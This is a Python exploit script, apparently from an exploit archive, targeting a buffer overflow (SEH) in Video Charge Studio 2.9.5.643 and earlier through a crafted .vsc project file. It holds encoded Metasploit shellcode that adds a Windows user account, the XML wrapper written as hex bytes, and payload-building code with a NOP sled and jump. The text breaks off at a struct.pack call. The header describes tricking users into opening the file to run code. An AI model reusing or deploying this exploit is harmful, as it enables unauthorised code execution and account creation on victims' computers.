#!/usr/bin/python # Exploit Title: Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH) # Date: 12/05/2010 # Author: xsploitedsec # URL: http://www.x-sploited.com/ # Contact: xsploitedsecurity [at] x-sploited.com # Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe # Version: <= 2.9.5.643 (Latest) # Tested on: Windows XP SP3 (Physical machine) # CVE: N/A ### Software Description: ### # Videocharge Studio is a video editing software which is intended for those users who # regularly work with video, create Internet video galleries, convert video files. # Videocharge Studio includes all features for video editing: video converting, splitting # video into parts, joining several video files into a single one, adding watermark on # video or image (add logo to video or photo), embedding image into video file, creating # video from several images, editing audio. Videocharge Studio can edit video without # reencoding as well. ### Exploit information: ### # Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc file's # "Filename" value field. # An attacker could trick a user into loading a specially crafted vsc file to execute # arbitrary code on a user's PC without their consent. ### Shouts: ### # kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity # Have fun! # "When you know that you're capable of dealing with whatever comes, you have the only # security the world has to offer."
-Harry Browne import struct import sys about = "=================================================\n" about += " Video Charge Studio <= 2.9.5.643 (.vsc) BoF (SEH)\n" about += " Author: xsploited security\n URL: http://www.x-sploited.com/\n" about += " Contact: xsploitedsecurity [at] gmail.com\n" about += "=================================================\n" print about # msfpayload windows/adduser user=xsploited pass=sec EXITFUNC=seh # R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b '\x00\x09\x0a # \x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07' > /tmp/encoded.txt # [*] x86/fnstenv_mov succeeded with size 302 (iteration=1) shellcode = ( "\x6a\x46\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce" "\xcf\xb0\x91\x83\xeb\xfc\xe2\xf4\x32\x27\x39\x91\xce\xcf" "\xd0\x18\x2b\xfe\x62\xf5\x45\x9d\x80\x1a\x9c\xc3\x3b\xc3" "\xda\x44\xc2\xb9\xc1\x78\xfa\xb7\xff\x30\x81\x51\x62\xf3" "\xd1\xed\xcc\xe3\x90\x50\x01\xc2\xb1\x56\x2c\x3f\xe2\xc6" "\x45\x9d\xa0\x1a\x8c\xf3\xb1\x41\x45\x8f\xc8\x14\x0e\xbb" "\xfa\x90\x1e\x9f\x3b\xd9\xd6\x44\xe8\xb1\xcf\x1c\x53\xad" "\x87\x44\x84\x1a\xcf\x19\x81\x6e\xff\x0f\x1c\x50\x01\xc2" "\xb1\x56\xf6\x2f\xc5\x65\xcd\xb2\x48\xaa\xb3\xeb\xc5\x73" "\x96\x44\xe8\xb5\xcf\x1c\xd6\x1a\xc2\x84\x3b\xc9\xd2\xce" "\x63\x1a\xca\x44\xb1\x41\x47\x8b\x94\xb5\x95\x94\xd1\xc8" "\x94\x9e\x4f\x71\x96\x90\xea\x1a\xdc\x24\x36\xcc\xa4\xce" "\x3d\x14\x77\xcf\xb0\x91\x9e\xa7\x81\x1a\xa1\x48\x4f\x44" "\x75\x31\xbe\xa3\x24\xa7\x16\x04\x73\x52\x4f\x44\xf2\xc9" "\xcc\x9b\x4e\x34\x50\xe4\xcb\x74\xf7\x82\xbc\xa0\xda\x91" "\x9d\x30\x65\xf2\xa3\xab\x9e\xf4\xb6\xaa\x90\xbe\xad\xef" "\xde\xf4\xba\xef\xc5\xe2\xab\xbd\x90\xe9\xbd\xbf\xdc\xfe" "\xa7\xbb\xd5\xf5\xee\xbc\xd5\xf2\xee\xe0\xf1\xd5\x8a\xef" "\x96\xb7\xee\xa1\xd5\xe5\xee\xa3\xdf\xf2\xaf\xa3\xd7\xe3" "\xa1\xba\xc0\xb1\x8f\xab\xdd\xf8\xa0\xa6\xc3\xe5\xbc\xae" "\xc4\xfe\xbc\xbc\x90\xe9\xbd\xbf\xdc\xfe\xa7\xbb\xd5\xf5" "\xee\xe0\xf1\xd5\x8a\xcf\xba\x91" ); header = ( 
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30" "\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69\x6e\x64\x6f\x77\x73\x2d" "\x31\x32\x35\x32\x22\x20\x3f\x3e\x3c\x63\x6f\x6e\x66\x69\x67\x20\x76\x65\x72\x3d" "\x22\x32\x2e\x39\x2e\x35\x2e\x36\x34\x33\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20" "\x6e\x61\x6d\x65\x3d\x22\x46\x69\x6c\x65\x73\x22\x2f\x3e\x0d\x0a\x3c\x63\x6f\x6c" "\x73\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66\x69\x6c\x65\x73\x22\x3e\x0d\x0a" "\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66" "\x69\x6c\x65\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20\x6e\x61\x6d\x65\x3d\x22\x46" "\x6f\x72\x6d\x61\x74\x73\x22\x3e\x0d\x0a\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20" "\x6e\x61\x6d\x65\x3d\x22\x46\x6f\x72\x6d\x61\x74\x22\x3e\x0d\x0a\x3c\x56\x61\x6c" "\x75\x65\x20\x6e\x61\x6d\x65\x3d\x22\x4e\x61\x6d\x65\x22\x20\x74\x79\x70\x65\x3d" "\x22\x38\x22\x20\x76\x61\x6c\x75\x65\x3d\x22" ); footer = ( "\x22\x2f\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d\x0a" "\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d" "\x0a\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x63\x6f\x6e\x66\x69\x67\x3e" ); size = 824; #824 junk bytes triggers the bof payload = "\x90" * (size - len(shellcode)); payload += shellcode payload += "\xEB\x06\x90\x90"; #jmp short payload += struct.pack("